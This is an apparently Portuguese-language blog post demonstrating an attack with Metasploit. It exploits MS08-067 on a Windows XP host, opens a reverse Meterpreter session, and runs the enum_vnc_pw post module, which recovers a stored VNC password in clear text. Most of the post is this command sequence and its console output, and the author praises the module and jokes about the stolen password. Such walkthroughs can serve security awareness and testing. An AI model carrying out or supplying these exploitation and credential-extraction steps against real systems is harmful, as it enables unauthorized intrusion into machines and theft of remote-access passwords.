Recentemente Chris Gate escreveu sobre o getvncpw, está feature do payload MSF Meterpreter quebra o algoritmo DES de senhas do *VNC. Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado AQUI Vamos aos testes

msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 11.11.11.11:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:Portuguese - Brazilian [*] Selected Target: Windows XP SP3 Portuguese - Brazilian (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (749056 bytes) to 11.11.11.11 [*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011

meterpreter > background

msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw

msf post(enum_vnc_pw) > set SESSION 1 SESSION => 1

msf post(enum_vnc_pw) > run [*] Enumerating VNC passwords on VITIMA [*] Checking UltraVNC... [*] Checking WinVNC3_HKLM... [*] Checking WinVNC3_HKCU... [*] Checking WinVNC3_HKLM_Default... [*] Checking WinVNC3_HKCU_Default... [*] Checking WinVNC_HKLM_Default... [*] Checking WinVNC_HKCU_Default... [*] Checking WinVNC4_HKLM... [+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: <== OLHE A SENHA AQUI ;-P [*] Checking WinVNC4_HKCU... [*] Checking RealVNC_HKLM... [*] Checking RealVNC_HKCU... [*] Checking TightVNC_HKLM... [*] Checking TightVNC_HKLM_Control_pass... [*] Post module execution completed msf post(enum_vnc_pw) >

Com certeza este é um excelente módulo. Cuidado com seus VNCs jejejejejeje!!!!!

Nenhum comentário foi encontrado.